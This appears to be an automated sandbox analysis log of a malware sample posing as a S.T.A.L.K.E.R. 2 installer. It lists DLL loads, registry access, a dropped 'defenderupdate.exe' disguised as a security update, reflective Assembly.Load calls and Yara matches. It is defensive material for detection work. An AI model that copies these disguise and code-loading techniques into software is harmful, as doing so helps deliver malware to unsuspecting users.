                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: msi.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpWindow found: window name: TSelectLanguageFormJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: eBHn6qHPLz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: eBHn6qHPLz.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: eBHn6qHPLz.exeStatic file information: File size 3410432 > 1048576
                  Source: eBHn6qHPLz.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x32ce00
                  Source: eBHn6qHPLz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: b{app}/Engine\Binaries\Win64\CrashReportClient.pdb source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000003.1857499053.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: eBHn6qHPLz.exe, 00000000.00000002.1892169494.0000000007287000.00000004.00000800.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000000.00000002.1925160227.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2183906073.000000000457D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 1{app}/Engine\Binaries\Win64\CrashReportClient.pdb`Ex source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.0000000002775000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: eBHn6qHPLz.exe, 00000000.00000002.1892169494.0000000007287000.00000004.00000800.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000000.00000002.1925160227.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2183906073.000000000457D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ebefore_install('1beb46cfc001e87fea83dc90c12cc9b3', 'Engine\Binaries\Win64\CrashReportClient.pdb', 16)_w source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.0000000002775000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: F{app}/Engine\Binaries\Win64\tbb.pdb source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000003.1857499053.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: #{app}/Engine\Binaries\Win64\tbb.pdb source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3559707328.0000000003710000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Vbefore_install('e7feb7079e7c0eff2bb1598dd7f7026e', 'Engine\Binaries\Win64\tbb.pdb', 1) source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.000000000278B000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: eBHn6qHPLz.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: eBHn6qHPLz.exe, Hbasusze.cs.Net Code: Ecfyljkvddn System.Reflection.Assembly.Load(byte[])
                  Source: defenderupdate.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: defenderupdate.exe.0.dr, Hbasusze.cs.Net Code: Ecfyljkvddn System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, Hbasusze.cs.Net Code: Ecfyljkvddn System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.eBHn6qHPLz.exe.6410000.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.eBHn6qHPLz.exe.6410000.4.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.eBHn6qHPLz.exe.6410000.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.eBHn6qHPLz.exe.6410000.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.eBHn6qHPLz.exe.6410000.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.78c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1859614323.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1918216843.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041BCE3
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_00EEE9E0 pushad ; retf 0_2_00EEE9FE
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_00EEDBE0 pushad ; ret 0_2_00EEDBE1
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B9F960 push ds; iretd 0_2_04B9F91F
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04BACEBA push eax; retf 0_2_04BACEC1
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04BAD7F2 pushfd ; iretd 0_2_04BAD7F9
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04BAC0BA pushad ; ret 0_2_04BAC0C1
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_06474B44 push es; retf 0_2_06474B48
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_018ADBE0 pushad ; ret 8_2_018ADBE1
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A8CEBB push eax; retf 8_2_06A8CEC1
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A8664A push FFFFFF8Bh; ret 8_2_06A8664E
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A8D7F3 pushfd ; iretd 8_2_06A8D7F9
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A867C0 push FFFFFF8Bh; iretd 8_2_06A867C7
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A8EC7F push es; ret 8_2_06A8EC80
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A8C0BB pushad ; ret 8_2_06A8C0C1
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B70D18 push E8FFFFFFh; iretd 8_2_06B70D1D
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B71D7E push es; ret 8_2_06B71D90
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004567E0 push eax; ret 9_2_004567FE
